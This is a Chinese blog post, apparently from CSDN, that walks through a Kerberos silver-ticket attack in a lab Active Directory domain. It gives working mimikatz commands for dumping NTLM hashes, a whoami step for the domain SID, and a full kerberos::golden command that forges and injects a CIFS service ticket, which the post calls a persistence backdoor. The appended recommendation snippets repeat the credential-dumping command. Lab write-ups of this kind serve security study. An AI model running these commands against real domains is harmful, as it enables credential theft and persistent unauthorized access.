域渗透之银票据学习

最新推荐文章于 2024-06-05 01:28:34 发布
最新推荐文章于 2024-06-05 01:28:34 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: 域渗透 银票据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws13129/article/details/91374356
版权

银票据(silver ticket):它不需要和域控制器进行通信,原理是伪造TGS,使用的是计算机账户的hash进行加密的,所以只能访问指定的权限,也就是只能访问特定的服务。

0x01 银票据利用条件

域控计算机账户的ntlm hash

域中的sid值

一台域中主机

与其说是一种攻击方式,不如说是一种后门,当域控权限掉后,再重新获取权限。

0x02 实战

环境
域控2k3,ip:192.168.5.97
域内主机07,ip:192.168.5.155

1)在域控中导出计算机账号的ntlm hash

mimikatz log "privilege::debug" "sekurlsa::logonpasswords"

在这里插入图片描述

2)获取域的sid,任意域内主机,不要后面的-1107

whoami /all

在这里插入图片描述

3) 在攻击机使用mimikatz执行,user名随意,cifs是指的文件共享服务。

kerberos::golden /domain:jiu.com /sid:S-1-5-21-3949334927-2019361082-1435771806  /target:aa-e.jiu.com /rc4:e3e13d1245a7cb55fd58ac902fc0d760  /service:cifs /user:jiu /ptt

在这里插入图片描述

4) 验证

在这里插入图片描述

0x03 踩坑

target应为计算机全名

在这里插入图片描述

0x04 参考

https://www.cnblogs.com/bmjoker/p/10355979.html
https://www.freebuf.com/articles/system/197160.html
cxk331
关注
专栏目录
渗透--金银票据问题
Vdieoo的博客
10-30 1217
金票据 伪造凭据,提升内普通用户权限 以admin用户登入任意一台内主机 收集信息 命令有:net config workstation,可以看到名为:cyberpeace。 nltest /dsgetdc:名,可以看到控主机名为:scene。 以admin权限运行mimikztz mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt 找...
渗透之黄金票据与白银票
dys的博客
07-19 576
黄金票据和白银票据 kerberos协议
内横向渗透-PTT票据传递之黄金票据 (Golden Ticket)
m0_62783065的博客
09-22 571
PTT票据传递之黄金票据 (Golden Ticket),介绍黄金票据的原理及其使用方法
渗透之金票据学习
cxk
04-28 1531
金票据(golden ticket):伪造票据授予票据(TGT),也被称为认证票据。 krbtgt账户:每个控制器都有一个“krbtgt”的用户账户,是KDC的服务账户,用来创建票据授予服务(TGS)加密的密钥。 0x01金票据利用条件 控中krbtgt账户NTLM密码哈希 中的sid值 一台中主机 与其说是一种攻击方式,不如说是一种后门,当控权限掉后,再重新获取权限。 0x02实战 环...
渗透之票据传递攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-13 584
Kerberos 认证并不是天衣无缝的,这其中也会有各种漏洞能够被我们利用,比如我们常说的 MS14-068、黄金票据、白银票据等就是基于Kerberos协议进行攻击的。下面我们便来大致介绍一下Kerberos 认证中的相关安全问题。
AD渗透 黄金与白银票据攻击
m0_57221101的博客
04-12 807
过两天研究明白kerberos协议里每次发包中各个参数的含义之后,会发一个协议的详细解析,也许能帮助大家比较详细的理解这套协议。敬请期待 以下演示环境借用红日团队vulnstack2环境,感谢 工具 gentilkiwi/mimikatz: A little tool to play with Windows security (github.com) 也可以使用kali中帮你预编译好的,直接输入mimikatz就会告诉你在哪 黄金票据 原理 黄金票据攻击发生在我们知道中的tgt验证用户k
渗透 | 白银票据利用
无心的博客
10-30 2975
目录 0x01 介绍 0x02 白银票据利用 0x01 介绍 之前,我们已经详细说过Kerberos认证的流程,这次我们就来说说如何对其进行利用,这次主要说的是白银票据伪造(Silver Tickets) 白银票据伪造利用的是Kerberos认证中的第三个步骤,在第三步的时候,client会带着ticket向server的某个服务进行请求,如果验证通过就可以访问server上的指定服务了,这里...
渗透 | 白银票据防御
无心的博客
10-30 866
昨天的文章中我们说了在渗透中白银票据的利用,但是如何对其进行防御呢,如果没有看过白银票据利用的文章,请移步《渗透 | 白银票据利用》 目录 0x01 介绍 0x02 防御方法 0x03 防御效果 0x01 介绍 对于白银票据的利用,我们昨天已经说的很明白了,就是因为server在接收到client发送的ticket时,server仅仅只知道自己的hash,也就是server hash,而对...
从Github一开源项目ADSEC【学习渗透攻防基础】
HBohan的博客
07-30 2070
学习的开源项目是: https://github.com/cfalta/adsec 有些地方是直接Google 翻译过来的。 注意:本人渗透新手,很多问题都不懂,有问题欢迎大哥后台留言啊!!! Lab Setup – 环境搭建 学习的过程中,最难的就是环境搭建了。(因为有些坑,别人不一定遇到,么有地方可以问,然后有些问题就离谱。。) 物理机:MacBookPro 2020 Intel i5 虚拟机:Vmware Fusion Windows Server 2019 * 3 成员用户密码:P@.
红队专题-内网横向-工作组Workgroup与 Domain Active Directory渗透
aming小老弟
12-21 1275
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得管理员权限,即可控制内所有用户和主机,因此活动目录环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
Active Directory渗透之白银票证后门
weixin_33827590的博客
09-19 265
本文讲的是Active Directory渗透之白银票证后门,本文的内容描述了一种方法,通过该方法,攻击者可以在拿到管理级别的权限约5分钟后,就可持久的对Active Directory的管理进行访问。 这篇文章将探讨攻击者如何利用计算机帐户凭据来持久的访问和控制企业内网,以及企业如何缓解这类潜在的安全问题。 计算机帐号 加入Active Dire...
内横向渗透-PTT票据传递之白银票据 (Silver Ticket)
m0_62783065的博客
09-22 407
PTT票据传递之黄金票据 Silver Ticket,介绍了白银票据的原理及其利用所需要的条件和利用方法。
银票据~
Y22Lee的博客
06-05 504
在windows主机之间进行网络文件共享是通过使用微软公司自己的CIFS服务实现的(IPC)第一步:检查电脑是否加入并查看权限,加入可以直接使用白银票据。2、如果通过枚举出来一个中的管理员用户,可以使用如下的命令。在工作组中的机器使用白银票据的时候需要注意如下的问题。白银票据可以伪造的服务非常多,简单列举几个常用的。第三步:伪造LDAP服务的白银票据并注入到内存中。第三步:获取制作白银票据的条件,伪造CIFS服务。第四步:通过dcsync查询控上的hash值。第六步:使用之前的上线办法上线CS。
银票据的原理和使用
qq_45455136的博客
12-21 1151
银票据的原理和使用 白银票据(Silver Ticket)原理 白银票据的使用 服务账号是计算机名字+$用来管理服务的账号 白银票据(Silver Ticket)原理 白银票据是伪造本该由TGS返回的ST(服务票据),从而访问对应的服务 有server用户的hash就可以伪造出ST,且不经过KDC,但伪造的票只对部分服务起作用,权限比黄金票据低
渗透-白银票据和黄金票据的利用
orange777
02-23 3857
最近做了一些靶场渗透的实验,记录下一些关于白银票据和黄金票据的问题。 0x01 白银票据的利用 1 环境信息 控DC 192.168.183.130 内主机win7 192.168.183.129 2 使用场景 在拿到一个普通的成员权限的时候,可以尝试使用ms14-068伪造一个票据,从而让我们的用户有管理员权限。 3 利用过程 说明:这里是用vulnstack4靶机笔记的实验环境,来演示一下利用过程 获取sid whoami /all 伪造票据 MS14-068.exe -u 用户名@
银票据原理制作与利用
G3et的博客
01-19 305
1、如果是普通用户,主要看防火墙,开了防火墙可能会导致dir过不去2、白银票据伪造的是ST,只能访问特定的服务,如cifs(文件共享服务)、winrm(远程管理)3、白银票据获取的是服务的hash4、白银票据不通过kdc,相对黄金票据银票更加隐蔽。
3.5 Silver Ticket白银票据制作原理及利用方式
GloryGod的博客
08-24 250
服务账号就是计算机名字+$用来管理服务的账号。
kerberos 票据_白银票据(Silver Ticket)攻击
weixin_39851261的博客
12-05 655
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 38 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更白银票Silver Ticket(白银票据)不同与 Golden Ticket。Silver Ticket 的利用过程是伪造 TGS,通过已知的授权服务密码生成一张可以访问该服务的 TGT。因为在票据生成过程中不需要使用 KDC...
Kerberos的白银票据详解
weixin_30532987的博客
12-26 4150
0x01白银票据(Silver Tickets)定义 白银票据(Silver Tickets)是伪造Kerberos票证授予服务(TGS)的票也称为服务票据。如下图所示,与控制器没有AS-REQ 和 AS-REP(步骤1和2),也没有TGS-REQ / TGS-REP(步骤3和4)通信。由于银票是伪造的TGS,所以没有与控制器通信。 0x02白银票据的特点 1.白银票据...
内网渗透的白银票据和黄金票据是啥
最新发布
08-23
内网渗透中的"白银票据"和"黄金票据"并不是真正的金融票据,而是网络安全术语。白银票据通常是指相对较低权限的攻击手段,比如利用常见的漏洞或是弱密码进行未经授权的访问,获取的信息有限,风险也较小。而黄金票据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值